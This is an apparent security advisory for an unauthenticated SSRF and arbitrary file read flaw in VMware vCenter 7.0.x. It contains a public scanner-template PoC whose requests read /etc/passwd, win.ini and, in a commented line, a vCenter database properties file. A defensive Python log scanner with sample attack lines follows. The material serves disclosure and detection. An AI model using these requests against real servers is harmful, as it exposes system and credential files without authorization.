vmware-vcenter-provider-logo-ssrf: Vmware VCenter - Arbitrary File Read

Date: 2025-09-01 | Affected software: Vmware VCenter | POC: public

Vulnerability description

Certain versions of VMware vCenter v7.0.x contain an unauthenticated SSRF vulnerability: reading local files through it leaks sensitive information, and fetching remote files through it can produce XSS.

PoC code [public]

id: vmware-vcenter-provider-logo-ssrf

info:
  name: Vmware VCenter - Arbitrary File Read
  author: xpoc
  severity: critical
  verified: true
  description: |-
    VMware vCenter v 7.0.x 的某些版本中存在未授权 SSRF 漏洞,可以读取本地文件造成敏感信息泄露;读取远程文件形成 XSS 漏洞。
  tags: vmware,vmware-vcenter,lfi,ssrf
  created: 2024/01/05

rules:
  r0:
    request:
      method: GET
      path: /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  r1:
    request:
      method: GET
      #path: /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///C:/ProgramData/VMware/vCenterServer/cfg/vmware-vpx/vcdb.properties
      path: /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///c://windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support")
expression: r0() || r1()
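From the defender's side, the two requests in the PoC are easy to spot in web-server access logs: any request to the provider-logo endpoint whose `url` parameter does not point at an expected provider over HTTP(S) is suspicious, and a `file://` value with a 200 response is a likely successful read. The script below is an added example written for this page, not part of the PoC or VMware's code. It assumes combined-format access logs, a hypothetical `ALLOWED_HOSTS` allowlist, and constructed sample lines; it generalizes beyond the PoC's two `file://` cases by also flagging other non-HTTP schemes and fetches from hosts outside the allowlist.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint path taken from the advisory's PoC.
VULN_PATH = "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"

# Hypothetical allowlist: the provider hosts this endpoint is expected to fetch logos from.
ALLOWED_HOSTS = {"providers.example.internal"}

# Parser for combined/common log format; only ip, target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample access-log lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Sep/2025:10:00:01 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd HTTP/1.1" 200 1834
203.0.113.5 - - [01/Sep/2025:10:00:02 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=FILE%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini HTTP/1.1" 200 92
198.51.100.9 - - [01/Sep/2025:10:00:03 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=http://203.0.113.77/logo.png HTTP/1.1" 200 4410
10.0.0.4 - - [01/Sep/2025:10:00:04 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://providers.example.internal/logo.png HTTP/1.1" 200 4410
10.0.0.4 - - [01/Sep/2025:10:00:05 +0000] "GET /ui/ HTTP/1.1" 200 512
203.0.113.5 - - [01/Sep/2025:10:00:06 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/shadow HTTP/1.1" 403 0
"""


def normalize(value, rounds=2):
    """Undo repeated percent-encoding so FILE%3A%2F%2F and file:// compare equal."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.strip()


def classify_target(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("url", []):
        url = urlsplit(normalize(raw))
        scheme = url.scheme.lower()          # urlsplit already lowercases, kept explicit
        host = (url.hostname or "").lower()
        if scheme == "file":
            return "local-file-read"         # the advisory's arbitrary-file-read case
        if scheme not in ("http", "https"):
            return "non-http-scheme"         # generic SSRF probing
        if host not in ALLOWED_HOSTS:
            return "unexpected-remote-fetch" # the remote-file / XSS case
    return None


def scan(log_text):
    """Return (ip, status, label, target) for every suspicious provider-logo request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_target(m.group("target"))
        if label:
            findings.append((m.group("ip"), int(m.group("status")), label, m.group("target")))
    return findings


def likely_successful_reads(findings):
    """Filter to file:// requests the server answered with 200, i.e. probable data exposure."""
    return [f for f in findings if f[2] == "local-file-read" and f[1] == 200]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
    print("likely successful reads:", len(likely_successful_reads(scan(SAMPLE_LOG))))
```

A 403 on a `file://` request (last sample line) is still worth alerting on as reconnaissance, which is why `scan` reports it and only `likely_successful_reads` narrows to the 200 responses that indicate actual exposure. In a real deployment, replace `SAMPLE_LOG` with the vCenter front-end access log and feed the findings to your SIEM.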
